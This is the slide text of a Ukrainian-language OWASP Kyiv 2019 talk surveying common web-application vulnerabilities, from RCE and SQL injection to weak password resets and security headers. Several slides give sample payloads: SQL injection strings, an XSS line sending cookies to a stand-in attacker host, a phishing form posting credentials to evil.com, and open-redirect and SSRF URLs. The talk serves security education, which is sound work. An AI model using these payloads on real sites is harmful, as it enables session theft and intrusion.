Поговоримо про найпопулярніші помилки, яких припускаються розробники веб додатків, та як зловмисник може використати їх на свою користь. Охопимо максимальну кількість матеріалу за короткий проміжок часу.

1. KYIV 2019
Короленко Сергій
Всі вразливості у веб додатках

3. Bugcrowd’s Vulnerability Rating Taxonomy

4. RCE
Remote Code Execution | Code injection

5. RCE
Remote Code Execution | Code injection

6. SQL Injection

7. SQL Injection

8. SQL Injection

9. SQL Injection

10. SQL Injection

11. Stacked queries
UNION query-based
Error-based
Boolean-based blind
Time-based blind
1 AND (ascii(substr((SELECT version()),1,1))) > 52—
1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)—
1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x
FROM information_schema.TABLES GROUP BY x)a)--
1 UNION ALL SELECT NULL,version()--
1; SELECT version()--
SQL Injection

12. XXE |XML external entity injection

13. FILE INCLUSION
<?php
$file = $_GET[«file»];
include(“/var/www/backend/$file”);
?>
https://example.com/?page=contact.php

14. DIRECTORY TRAVERSAL

15. UNSAFE FILE UPLOAD

16. UNSAFE FILE UPLOAD

18. CRLF injection
(CRLF, rn, %0A%0D)

19. HTML Injection
Hi! My name is <h1>hacker</h1>
Hello
HACKER
Hi! My name is <h1>Log in to view a content</h1>
<form action="http://evil.com">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit">
</form>

20. XSS | Cross Site Scripting

21. XSS Stored/Reflected

22. XSS | Cross Site Scripting
www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

23. Open Redirection
https://bank.com/redirect.php?go=http://attacker.com/phish/

24. http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280
http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483
CSRF | Cross-Site Request Forgery

25. CSRF | Cross-Site Request Forgery

26. SSRF| Server Side Request Forgery
http://example.com/?url=http://localhost/server-status

27. Default Credentials/Configuration

28. Authentication Bypass

29. Weak Password Policy

30. Weak password reset question/answer

31. Weak password change/reset
http://bank.com/reset_password?email=ololo@example.com&token=1561324612
http://bank.com/reset_password?email=ololo@example.com&token=1561324754
http://bank.com/reset_password?email=ololo@example.com&token=1561324698
MD5 ("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36
http://bank.com/reset_password?email=ololo@example.com&token=
83fa8dbfe2725ff513c4028a7f60df36
http://bank.com/reset_password?email=ololo@example.com&token=
83fa8dbfe2725ff513c4028a7f60df36

32. Bypass 2FA

33. Privilege Escalation

34. Broken Access Control
http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!

35. COOKIES Attributes

36. Session Fixation

37. Password
API Keys
/.git/
Sensitive Data Exposure

38. Directory Listing DirSearch (backups, logs, etc.)

39. Unencrypted Communication

40. Privileged user: uid=0(root)
No Rate Limits
CAPTCHA Bypass

41. Security Headers
•Server headers that protect against attacks
◦HTTP Strict Transport Security
◦Content Security Policy
◦Access-Control-Allow-Origin
◦X-FrameOptions
◦X-XSS-Protection
◦X-Content-Type-Options
•Server headers that leak information
◦Server
◦X-Powered-By
◦X-AspNet-Version

42. Detailed Error

44. https://www.youtube.com/OWASPKyiv
https://www.facebook.com/owaspkyiv
https://owasp.slack.com/messages/chapter-ua/